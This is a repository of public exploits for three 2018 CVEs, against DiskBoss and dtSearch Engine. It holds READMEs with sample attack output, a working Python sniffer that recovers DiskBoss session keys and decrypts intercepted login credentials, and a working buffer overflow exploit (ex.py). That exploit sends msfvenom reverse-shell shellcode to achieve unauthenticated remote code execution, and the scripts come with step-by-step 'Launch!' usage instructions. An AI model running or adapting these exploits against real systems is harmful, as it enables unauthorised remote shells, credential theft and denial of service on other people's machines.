├── CVE-2018-11488
    ├── README.md
    ├── dos.py
    └── evidence.png
├── CVE-2018-5261
    ├── README.md
    ├── capture.pcap
    ├── evidence.png
    └── sniff.py
├── CVE-2018-5262
    ├── README.md
    ├── evidence.png
    └── ex.py
└── README.md


/CVE-2018-11488/README.md:
--------------------------------------------------------------------------------
 1 | # dtSearch Engine <= v7.90.8538.1 Denial of Service
 2 | 
 3 | ### Description
 4 | A stack exhaustion vulnerability in the search function of dtSearch Corp. dtSearch Engine 7.90.8538.1 and prior allows remote attackers to cause a denial of service condition by sending a specially crafted HTTP request.
 5 | 
 6 | ### Example output
 7 | ```
 8 | [+] Retrieving form from http://localhost/dtSearch.html
 9 | 
10 | [+] Variables:
11 | * Url: "http://localhost/dtSearch/dtisapi6.dll"
12 | * Keyword: "server"
13 | * Index: "*{aa7eb69bcc7362bf3b92a8b29ae568ff} documents"
14 | * OrigSearchForm: "/dtSearch.html"
15 | 
16 | [+] Sending DoS payload... Succes! Connection reset.
17 | [+] Sending DoS payload... Succes! Connection reset.
18 | [+] Sending DoS payload... Succes! Connection reset.
19 | [+] Sending DoS payload... Succes! Connection reset.
20 | [+] Sending DoS payload... Succes! Connection reset.
21 | [+] Sending DoS payload... Failed. Server down?
22 | ```
23 | 
24 | ### Screenshot
25 | ![Evidence](evidence.png)
26 | 


--------------------------------------------------------------------------------
/CVE-2018-11488/dos.py:
--------------------------------------------------------------------------------
1 | # To be added later
2 | 


--------------------------------------------------------------------------------
/CVE-2018-11488/evidence.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bitsadmin/exploits/dde821500606d5274fd43a417b5e365b2e0445f3/CVE-2018-11488/evidence.png


--------------------------------------------------------------------------------
/CVE-2018-5261/README.md:
--------------------------------------------------------------------------------
 1 | # DiskBoss <= 8.8.16 - Sensitive Information Disclosure
 2 | 
 3 | ### Description
 4 | Due to the usage of plaintext information from the handshake as input for the encryption key used for the encryption of the rest of the session, the DiskBoss server and client disclose sensitive information like the authentication credentials to any man-in-the-middle (MiTM) listener.
 5 | 
 6 | ### Example output
 7 | ```
 8 | [+] Capture started
 9 | [+] Captured key
10 | Plain: WIN7SP1X64_8.3.12_00000003
11 | SHA256: 7ff43e63d72a9e1333db866e760a03706fe3831b673200aa3ab52366257b8910
12 | 
13 | [+] Captured packet
14 | ServerLogin_2_Data_3_1_ClientHostName_VISTASP0X86_1_UserName_admin_1_Password_admin___9___9_L!Qw
15 | 
16 | [+] Captured packet
17 | ERR_2_Data_0__VI
18 | ```
19 | 
20 | ### Screenshot
21 | ![Evidence](evidence.png)
22 | 


--------------------------------------------------------------------------------
/CVE-2018-5261/capture.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bitsadmin/exploits/dde821500606d5274fd43a417b5e365b2e0445f3/CVE-2018-5261/capture.pcap


--------------------------------------------------------------------------------
/CVE-2018-5261/evidence.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bitsadmin/exploits/dde821500606d5274fd43a417b5e365b2e0445f3/CVE-2018-5261/evidence.png


--------------------------------------------------------------------------------
/CVE-2018-5261/sniff.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: DiskBoss <= 8.8.16 - Sensitive Information Disclosure
  2 | # Date: 2017-08-27
  3 | # Exploit Author: Arris Huijgen
  4 | # Vendor Homepage: http://www.diskboss.com/
  5 | # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
  6 | # Version: Through 8.8.16
  7 | # Tested on: Kali 2017.2
  8 | # CVE: CVE-2018-5261
  9 | 
 10 | # Usage
 11 | # 1. Place yourself between the Diskboss server and client
 12 | # 2. Launch!
 13 | # Alternatively you can feed a pcap to this script
 14 | 
 15 | 
 16 | from scapy.all import *  # pip install scapy
 17 | from struct import pack
 18 | import re
 19 | import string
 20 | import math
 21 | import hashlib
 22 | from Crypto.Cipher import AES  # pip install pycrypto
 23 | 
 24 | 
 25 | # Global variables
 26 | aes_key = None
 27 | saw_hello = False
 28 | 
 29 | 
 30 | def main():
 31 |     print '[+] Capture started'
 32 |     diskboss_filter = 'tcp port 8094 or port 8096 or port 8097 or port 8098'
 33 |     #sniff(offline='capture.pcap', prn=parse_packet, filter=diskboss_filter)
 34 |     sniff(iface="eth0", prn=parse_packet, filter=diskboss_filter)
 35 | 
 36 | 
 37 | def parse_packet(pkt):
 38 |     global aes_key, saw_hello
 39 | 
 40 |     # Only PSH/ACK packets are interesting
 41 |     if pkt[TCP].fields['flags'] != 0x18:
 42 |         return
 43 | 
 44 |     # Obtain payload
 45 |     payload = pkt[Raw].original
 46 |     if payload.startswith(pack('<I', 0xabba1975)):
 47 | 
 48 |         # Client hello packet noticed
 49 |         if 'SERVER_GET_INFO' in payload:
 50 |             saw_hello = True
 51 |             return
 52 | 
 53 |         # Attempt to extract key
 54 |         if saw_hello:
 55 |             # Attempt to determine key
 56 |             extracted_key = extract_key(payload)
 57 | 
 58 |             # Store encryption key
 59 |             if extracted_key is not None:
 60 |                 aes_key = extracted_key
 61 |                 saw_hello = False
 62 |             return
 63 | 
 64 |         # If the key is available, attempt to decrypt packets
 65 |         if aes_key is not None:
 66 |             decrypt_print(payload, aes_key)
 67 | 
 68 | 
 69 | def extract_key(msg):
 70 |     msg_regex = re.compile('^.*HostName\x01(?P<hostname>\w+)\x011\x01Version\x01(?P<version>([0-9]+\.?)+)\x011\x01AgentId\x01(?P<agentid>[0-9]+)\x01.*$', re.DOTALL)
 71 |     groups = msg_regex.search(msg)
 72 |     if not groups:
 73 |         print 'Error getting key'
 74 |         return None
 75 | 
 76 |     hostname = groups.group('hostname')
 77 |     version = groups.group('version')
 78 |     agentid = groups.group('agentid')
 79 |     key = '%s_%s_%.8d' % (hostname, version, int(agentid))
 80 |     hashed_key = hashlib.sha256(key).digest()
 81 | 
 82 |     print '[+] Captured key\nPlain: %s\nSHA256: %s\n' % (key, hashed_key.encode('hex'))
 83 | 
 84 |     return hashed_key
 85 | 
 86 | 
 87 | def decrypt_print(ciphertext, key):
 88 |     # Decrypt
 89 |     aes = AES.new(key, AES.MODE_ECB)
 90 |     response = ciphertext[24:]  # strip header
 91 |     response = response.ljust(int(math.ceil(float(len(response)) / AES.block_size) * AES.block_size), '\x00')  # 16-byte alignment
 92 |     decrypted = aes.decrypt(response)
 93 | 
 94 |     # Replace non-ascii characters and print
 95 |     print '[+] Captured packet\n%s\n' % ''.join(c if c in string.printable else '_' for c in decrypted)
 96 | 
 97 | 
 98 | if __name__ == '__main__':
 99 |     main()
100 | 


--------------------------------------------------------------------------------
/CVE-2018-5262/README.md:
--------------------------------------------------------------------------------
1 | # DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
2 | 
3 | ### Description
4 | A stack-based buffer overflow in Flexense DiskBoss 8.8.16 and prior allows unauthenticated remote attackers to execute arbitrary code in the context of a highly-privileged account.
5 | 
6 | ### Screenshot
7 | ![Evidence](evidence.png)
8 | 


--------------------------------------------------------------------------------
/CVE-2018-5262/evidence.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/bitsadmin/exploits/dde821500606d5274fd43a417b5e365b2e0445f3/CVE-2018-5262/evidence.png


--------------------------------------------------------------------------------
/CVE-2018-5262/ex.py:
--------------------------------------------------------------------------------
  1 | # Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
  2 | # Date: 2017-08-27
  3 | # Exploit Author: Arris Huijgen
  4 | # Vendor Homepage: http://www.diskboss.com/
  5 | # Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
  6 | # Version: Through 8.8.16
  7 | # Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
  8 | # CVE: CVE-2018-5262
  9 | 
 10 | # Usage
 11 | # 1. Update the Target section
 12 | # 2. Update the shellcode
 13 | # 3. Launch!
 14 | 
 15 | 
 16 | import socket
 17 | from struct import pack
 18 | 
 19 | # Software editions (port, offset)
 20 | free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 21 | pro8416  = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 22 | ult8416  = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 23 | srv8416  = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
 24 | ent8416  = (8094, 0x1001806e) # ADD ESP,8 | RET 0x04 @ libpal.dll
 25 | ent8512  = (8094, 0x100180ee) # ADD ESP,8 | RET 0x04 @ libpal.dll
 26 | free8816 = (8096, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 27 | pro8816  = (8097, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 28 | ult8816  = (8098, 0x10037f6a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
 29 | srv8816  = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
 30 | ent8816  = (8094, 0x100180f9) # ADD ESP,8 | RET 0x04 @ libpal.dll
 31 | 
 32 | 
 33 | # Target
 34 | host         = '127.0.0.1'
 35 | (port, addr) = ent8816
 36 | 
 37 | 
 38 | def main():
 39 |     # Connect
 40 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 41 |     s.connect((host, port))
 42 |     print '[+] Connected to %s:%d' % (host, port)
 43 | 
 44 |     # Memory
 45 |     size = 1000
 46 |     offset = 128
 47 | 
 48 |     # Payload
 49 |     preret = '\xEB\x06\x90\x90'     # JMP 0x06
 50 |     ret = pack('<I', addr)          # Depending on the software edition
 51 |     pivot = '\xe9\x3f\xfb\xff\xff'  # JMP -0x4BC
 52 | 
 53 |     # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b '\x00'
 54 |     # Payload size: 351 bytes
 55 |     sc = (
 56 |         "\xb8\x80\xac\x48\x8f\xd9\xc4\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1"
 57 |         "\x52\x31\x45\x12\x03\x45\x12\x83\x45\xa8\xaa\x7a\xb9\x59\xa8"
 58 |         "\x85\x41\x9a\xcd\x0c\xa4\xab\xcd\x6b\xad\x9c\xfd\xf8\xe3\x10"
 59 |         "\x75\xac\x17\xa2\xfb\x79\x18\x03\xb1\x5f\x17\x94\xea\x9c\x36"
 60 |         "\x16\xf1\xf0\x98\x27\x3a\x05\xd9\x60\x27\xe4\x8b\x39\x23\x5b"
 61 |         "\x3b\x4d\x79\x60\xb0\x1d\x6f\xe0\x25\xd5\x8e\xc1\xf8\x6d\xc9"
 62 |         "\xc1\xfb\xa2\x61\x48\xe3\xa7\x4c\x02\x98\x1c\x3a\x95\x48\x6d"
 63 |         "\xc3\x3a\xb5\x41\x36\x42\xf2\x66\xa9\x31\x0a\x95\x54\x42\xc9"
 64 |         "\xe7\x82\xc7\xc9\x40\x40\x7f\x35\x70\x85\xe6\xbe\x7e\x62\x6c"
 65 |         "\x98\x62\x75\xa1\x93\x9f\xfe\x44\x73\x16\x44\x63\x57\x72\x1e"
 66 |         "\x0a\xce\xde\xf1\x33\x10\x81\xae\x91\x5b\x2c\xba\xab\x06\x39"
 67 |         "\x0f\x86\xb8\xb9\x07\x91\xcb\x8b\x88\x09\x43\xa0\x41\x94\x94"
 68 |         "\xc7\x7b\x60\x0a\x36\x84\x91\x03\xfd\xd0\xc1\x3b\xd4\x58\x8a"
 69 |         "\xbb\xd9\x8c\x1d\xeb\x75\x7f\xde\x5b\x36\x2f\xb6\xb1\xb9\x10"
 70 |         "\xa6\xba\x13\x39\x4d\x41\xf4\x39\x92\x49\x05\xae\x90\x49\x01"
 71 |         "\xfc\x1c\xaf\x63\x10\x49\x78\x1c\x89\xd0\xf2\xbd\x56\xcf\x7f"
 72 |         "\xfd\xdd\xfc\x80\xb0\x15\x88\x92\x25\xd6\xc7\xc8\xe0\xe9\xfd"
 73 |         "\x64\x6e\x7b\x9a\x74\xf9\x60\x35\x23\xae\x57\x4c\xa1\x42\xc1"
 74 |         "\xe6\xd7\x9e\x97\xc1\x53\x45\x64\xcf\x5a\x08\xd0\xeb\x4c\xd4"
 75 |         "\xd9\xb7\x38\x88\x8f\x61\x96\x6e\x66\xc0\x40\x39\xd5\x8a\x04"
 76 |         "\xbc\x15\x0d\x52\xc1\x73\xfb\xba\x70\x2a\xba\xc5\xbd\xba\x4a"
 77 |         "\xbe\xa3\x5a\xb4\x15\x60\x7a\x57\xbf\x9d\x13\xce\x2a\x1c\x7e"
 78 |         "\xf1\x81\x63\x87\x72\x23\x1c\x7c\x6a\x46\x19\x38\x2c\xbb\x53"
 79 |         "\x51\xd9\xbb\xc0\x52\xc8"
 80 |     )
 81 | 
 82 |     # Compile payload
 83 |     fill = 'A' * (offset - len(preret))
 84 |     code = fill + preret + ret + pivot
 85 |     nops = '\x90' * (size - len(code) - len(sc) - 100)
 86 |     payload = code + nops + sc + 'C' * 100
 87 | 
 88 |     # Compile message
 89 |     msg = (
 90 |         '\x75\x19\xba\xab' +
 91 |         '\x03\x00\x00\x00' +
 92 |         '\x00\x40\x00\x00' +
 93 |         pack('<I', len(payload)) +
 94 |         pack('<I', len(payload)) +
 95 |         pack('<I', ord(payload[-1])) + 
 96 |         payload
 97 |     )
 98 | 
 99 |     # Send message
100 |     s.send(msg)
101 |     print '[+] Exploit sent!'
102 | 
103 | 
104 | if __name__ == '__main__':
105 |     main()
106 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # List of public exploits
2 | 
3 | | CVE                               | Title                                                       | Links |
4 | | --------------------------------- | ----------------------------------------------------------- | ----- |
5 | | [CVE-2018-5261](/CVE-2018-5261)   | DiskBoss <= 8.8.16 - Sensitive Information Disclosure       | [CVE-Details](https://www.cvedetails.com/cve/CVE-2018-5261) |
6 | | [CVE-2018-5262](/CVE-2018-5262)   | DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution  | [CVE-Details](https://www.cvedetails.com/cve/CVE-2018-5262) \| [Exploit-DB](https://www.exploit-db.com/exploits/43478/) |
7 | | [CVE-2018-11488](/CVE-2018-11488) | dtSearch Engine <= v7.90.8538.1 - Denial of Service         | [CVE-Details](https://www.cvedetails.com/cve/CVE-2018-11488) |
8 | 


--------------------------------------------------------------------------------